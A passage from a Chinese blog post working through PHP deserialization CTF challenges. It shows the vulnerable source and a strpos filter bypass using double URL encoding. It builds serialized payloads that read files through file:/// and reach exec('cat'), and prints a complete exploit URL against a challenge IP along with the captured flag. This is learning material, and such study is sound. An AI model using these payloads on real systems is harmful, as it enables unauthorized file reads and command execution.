CURLOPT_RETURNTRANSFER, 1);</span><br><span class="line">        curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);</span><br><span class="line">        echo curl_exec($c);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        $this-&gt;test();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if (isset($_GET[&quot;z&quot;])) &#123;</span><br><span class="line">    unserialize($_GET[&quot;z&quot;]);</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;   </span><br></pre></td></tr></table></figure>

<h2 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h2><p>查看源代码，表明是一个反序列函数，通过get方式上传</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">if (isset($_GET[&quot;z&quot;])) &#123;</span><br><span class="line">    unserialize($_GET[&quot;z&quot;]);</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;   </span><br></pre></td></tr></table></figure>

<p>迷惑我们的，根本用不上</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function __destruct()&#123;</span><br><span class="line">       $this-&gt;test();</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>

<p>设置curl对话</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$c &#x3D; curl_init();</span><br><span class="line">        curl_setopt($c, CURLOPT_URL, $this-&gt;a);</span><br><span class="line">        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);</span><br><span class="line">        curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);</span><br><span class="line">        echo curl_exec($c);</span><br></pre></td></tr></table></figure>

<p> 表示受保护的，只有本类或子类或父类中可以访问 ，不可以在类外访问</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">protected $a;</span><br></pre></td></tr></table></figure>

<p> strpos() 函数查找字符串在另一字符串中第一次出现的位置，如果在$a中找到flag，$b就会被赋值就会die掉，所以我们不能让$b赋值，也就是说我们不可以让它在$中招到flag，我们需要对它进行url编码处理；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$b &#x3D; strpos($this-&gt;a, &#39;flag&#39;);</span><br><span class="line">        if($b) &#123;</span><br><span class="line">            die(&quot;Bye!&quot;);</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<h2 id="解题方法-3"><a href="#解题方法-3" class="headerlink" title="解题方法"></a>解题方法</h2><p>将代码改成：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">class Hello &#123;</span><br><span class="line">    protected $a&#x3D;&#39;file：&#x2F;&#x2F;&#x2F;f%25%36%63ag&#39;;&#x2F;&#x2F;表示受保护的，只有本类或子类或父类中可以访问</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line">$o &#x3D; new Hello();</span><br><span class="line">$d &#x3D; serialize($o).&quot;\n&quot;; </span><br><span class="line">echo $d;</span><br></pre></td></tr></table></figure>

<p>这里将 “ l ”url编码了两次，get传参会进行一次url编码，所以要进行两次编码，这里只要将flag中的字母随意进行url编码即可。</p>
<p>运行代码得到payload，这里的不可见字符改成%00,字符长度22要改为14，%25， %36和 %63算一个字符长度，（\00就是16进制的chr（0），%00是chr(0)的url编码，要二次编码），s要改为S（大写）才可以进行url编码，否则无法识别。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:5:&quot;Hello&quot;:1:&#123;S:4:&quot;%00*%00a&quot;;S:14:&quot;file:&#x2F;&#x2F;&#x2F;f%25%36%63ag&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>在地址栏上输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.98.234.232:28083&#x2F;?z&#x3D;O:5:%22Hello%22:1:&#123;S:4:%22%00*%00a%22;S:14:%22file:&#x2F;&#x2F;&#x2F;f%25%36%63ag%22;&#125;</span><br></pre></td></tr></table></figure>

<p>即可夺旗；</p>
<h1 id="unserialize5"><a href="#unserialize5" class="headerlink" title="unserialize5"></a>unserialize5</h1><p>题目代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class home</span><br><span class="line">&#123;</span><br><span class="line">    private $method;</span><br><span class="line">    private $args;</span><br><span class="line">    function __construct($method, $args)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;method &#x3D; $method;</span><br><span class="line">        $this-&gt;args &#x3D; $args;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        if (in_array($this-&gt;method, array(&quot;mysys&quot;))) &#123;</span><br><span class="line">            call_user_func_array(array($this, $this-&gt;method), $this-&gt;args);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function mysys($path)</span><br><span class="line">    &#123;</span><br><span class="line">        print_r(base64_encode(exec(&quot;cat $path&quot;)));</span><br><span class="line">    &#125;</span><br><span class="line">    function waf($str)</span><br><span class="line">    &#123;</span><br><span class="line">        if (strlen($str) &gt; 8) &#123;</span><br><span class="line">            die(&quot;No&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        return $str;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __wakeup()</span><br><span class="line">    &#123;</span><br><span class="line">        $num &#x3D; 0;</span><br><span class="line">        foreach ($this-&gt;args as $k &#x3D;&gt; $v) &#123;</span><br><span class="line">            $this-&gt;args[$k] &#x3D; $this-&gt;waf(trim($v));</span><br><span class="line">            $num +&#x3D; 1;</span><br><span class="line">            if ($num &gt; 2) &#123;</span><br><span class="line">                die(&quot;No&quot;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if ($_GET[&#39;path&#39;]) &#123;</span><br><span class="line">    $path &#x3D; @$_GET[&#39;path&#39;];</span><br><span class="line">    unserialize($path);</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h2 id="题目解析-3"><a href="#题目解析-3" class="headerlink" title="题目解析"></a>题目解析</h2><p>加一个@作用：不显示错误；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$path &#x3D; @$_GET[&#39;path&#39;];</span><br></pre></td></tr></table></figure>



<p>因为我们只是array（”/flag”）一个值，num=1不会大于2，长度不会大于8，所以对解题没有限制；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">function waf($str)</span><br><span class="line">    &#123;</span><br><span class="line">        if (strlen($str) &gt; 8) &#123;</span><br><span class="line">            die(&quot;No&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        return $str;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">function __wakeup()</span><br><span class="line">    &#123;</span><br><span class="line">        $num &#x3D; 0;</span><br><span class="line">        foreach ($this-&gt;args as $k &#x3D;&gt; $v) &#123;</span><br><span class="line">            $this-&gt;args[$k] &#x3D; $this-&gt;waf(trim($v));</span><br><span class="line">            $num +&#x3D; 1;</span><br><span class="line">            if ($num &gt; 2) &#123;</span><br><span class="line">                die(&quot;No&quot;);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>



<p>题目可以简化成</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class home</span><br><span class="line">&#123;</span><br><span class="line">    private $method;</span><br><span class="line">    private $args;</span><br><span class="line">    function __construct($method, $args)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;method &#x3D; $method;</span><br><span class="line">     &#x2F;&#x2F;让$method &#x3D;$_method，是两个不同的变量，_只是用来区别两个不同的变量，让我们可以直接用$method</span><br><span class="line">        $this-&gt;args &#x3D; $args;</span><br><span class="line">     &#x2F;&#x2F;让$args &#x3D;$_args，是两个不同的变量，让我们可以直接用$args</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        if (in_array($this-&gt;method, array(&quot;mysys&quot;)))</span><br><span class="line">        &#x2F;&#x2F;判断传回来的数组有没有mysys，然后执行回调函数</span><br><span class="line">        &#123;</span><br><span class="line">            call_user_func_array(array($this, $this-&gt;method), $this-&gt;args);</span><br><span class="line">            &#x2F;&#x2F;回调函数，为了调用mysys,$this创建一个空的对象</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function mysys($path)</span><br><span class="line">    &#123;</span><br><span class="line">        print_r(base64_encode(exec(&quot;cat $path&quot;)));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>执行这个函数就可以cat $path，$path是可以控制的，让$path=”/flag”,就可以cat flag，因为base64编码了，所以后面我们要base64解码一下；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">function mysys($path)</span><br><span class="line">   &#123;</span><br><span class="line">       print_r(base64_encode(exec(&quot;cat $path&quot;)));</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>

<h2 id="解题方法-4"><a href="#解题方法-4" class="headerlink" title="解题方法"></a>解题方法</h2><p>改代码如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class home</span><br><span class="line">&#123;</span><br><span class="line">    private $method;</span><br><span class="line">    private $args;</span><br><span class="line">    function __construct($method, $args)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;method &#x3D; $method;&#x2F;&#x2F;$method&#x3D;$_method；</span><br><span class="line">        $this-&gt;args &#x3D; $args;&#x2F;&#x2F;$args&#x3D;$_args;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"> </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$o &#x3D; new home(&quot;mysys&quot;,array(&quot;&#x2F;flag&quot;));</span><br><span class="line"></span><br><span class="line">$a &#x3D; serialize($o);</span><br><span class="line"></span><br><span class="line">$a &#x3D;urlencode($a);</span><br><span class="line"></span><br><span class="line">print_r($a);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>运行得到payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O%3A4%3A%22home%22%3A2%3A%7Bs%3A12%3A%22%00home%00method%22%3Bs%3A5%3A%22mysys%22%3Bs%3A10%3A%22%00home%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D</span><br></pre></td></tr></table></figure>

<p>get传参，再将得到的一串字符 ，base64解码一下得到：</p>
<p><strong>flag{d32a1a59-76c6-4b8b-ae8d-5c23be7228b2}</strong></p>
<h1 id="解题中的知识"><a href="#解题中的知识" class="headerlink" title="解题中的知识"></a>解题中的知识</h1><h2 id="设置Sublime软件中可以运行代码"><a href="#设置Sublime软件中可以运行代码" class="headerlink" title="设置Sublime软件中可以运行代码"></a>设置Sublime软件中可以运行代码</h2><p>一，打开平时所用的php版本根目录，并复制此地址；例如：D:\phpStudy\PHPTutorial\php\php-5.4.45-nts</p>
<p><img src="https://i.loli.net/2020/11/05/qCQgokfKpHBE5Pr.png" alt="1604568992092.png"></p>
<p>二，右击此电脑，打开属性，点击高级系统设置，打开环境变量，点击系统变量的path变量将上一步复制的地址写进去；</p>
<p><img src="https://i.loli.net/2020/11/05/JfgkMBQZWb5p89i.png" alt="1604569106085.png"></p>
<p>三，打开sublime软件，选择工具—&gt;Bulid System—&gt;New Build System,然后清除所有代码再输入如下代码；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">&quot;cmd&quot;:[&quot;php&quot;, &quot;-f&quot;, &quot;$file&quot;],</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://i.loli.net/2020/11/05/avUcOojmYsw4IRD.png" alt="1604569143047.png"></p>
<p>四，保存该文件，命名为PHP5.sublime-build，我们就可以通过按ctrl+b运行代码了。</p>
<p><img src="https://i.loli.net/2020/11/06/xl1D5rSfYq2RbnM.png" alt="1604569007941.png"></p>
<h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><p>类：函数的集合。</p>
<p>file_get_contents函数作用：打开一个文件，可以打开一个远程文件，是ssrf漏洞的<strong>典型特征</strong>；</p>
<p>类里面的变量称为属性，类里面的函数称之为方法；</p>
<p>在php中两个等号只会比较数值是否相等，而三个等号是会比较数据类型是否相等；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">var_dump(1 &#x3D;&#x3D;&quot;1&quot;)</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>两个等号会相等，三个等号就不相等了，因为一个是int类型一个是字符串类型，类型不一样所以不相等；</p>

    </div>

    
    
    

 
   <div>
     <div>
    
        <div style="text-align:center;color: #ccc;font-size:24px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
   </div>
 
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>lgq
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2020/11/05/web%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/" title="web反序列化漏洞笔记">http://example.com/2020/11/05/web反序列化漏洞笔记/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/10/31/PHP%E5%B0%8F%E9%A1%B9%E7%9B%AE%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="prev" title="PHP小项目的学习笔记">
      <i class="fa fa-chevron-left"></i> PHP小项目的学习笔记
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/11/06/strf%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="next" title="ssrf和无参数学习笔记">
      ssrf和无参数学习笔记 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#unserialize1"><span class="nav-number">1.</span> <span class="nav-text">unserialize1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%96%B9%E6%B3%95"><span class="nav-number">1.1.</span> <span class="nav-text">解题方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E8%A7%A3%E6%9E%90"><span class="nav-number">1.2.</span> <span class="nav-text">题目解析</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#unserialize2"><span class="nav-number">2.</span> <span class="nav-text">unserialize2</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%96%B9%E6%B3%95-1"><span class="nav-number">2.1.</span> <span class="nav-text">解题方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E8%A7%A3%E6%9E%90-1"><span class="nav-number">2.2.</span> <span class="nav-text">题目解析</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#unserialize3"><span class="nav-number">3.</span> <span class="nav-text">unserialize3</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%96%B9%E6%B3%95-2"><span class="nav-number">3.1.</span> <span class="nav-text">解题方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E8%A7%A3%E6%9E%90-2"><span class="nav-number">3.2.</span> <span class="nav-text">题目解析</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#unserialize4"><span class="nav-number">4.</span> <span class="nav-text">unserialize4</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="nav-number">4.1.</span> <span class="nav-text">题目分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%96%B9%E6%B3%95-3"><span class="nav-number">4.2.</span> <span class="nav-text">解题方法</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#unserialize5"><span class="nav-number">5.</span> <span class="nav-text">unserialize5</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E8%A7%A3%E6%9E%90-3"><span class="nav-number">5.1.</span> <span class="nav-text">题目解析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E6%96%B9%E6%B3%95-4"><span class="nav-number">5.2.</span> <span class="nav-text">解题方法</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E8%A7%A3%E9%A2%98%E4%B8%AD%E7%9A%84%E7%9F%A5%E8%AF%86"><span class="nav-number">6.</span> <span class="nav-text">解题中的知识</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AE%BE%E7%BD%AESublime%E8%BD%AF%E4%BB%B6%E4%B8%AD%E5%8F%AF%E4%BB%A5%E8%BF%90%E8%A1%8C%E4%BB%A3%E7%A0%81"><span class="nav-number">6.1.</span> <span class="nav-text">设置Sublime软件中可以运行代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="nav-number">6.2.</span> <span class="nav-text">基础知识</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="lgq"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">lgq</p>
  <div class="site-description" itemprop="description">欢迎浏览， 请多多指教</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lgq</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 


<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共10.3k字</span>
</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
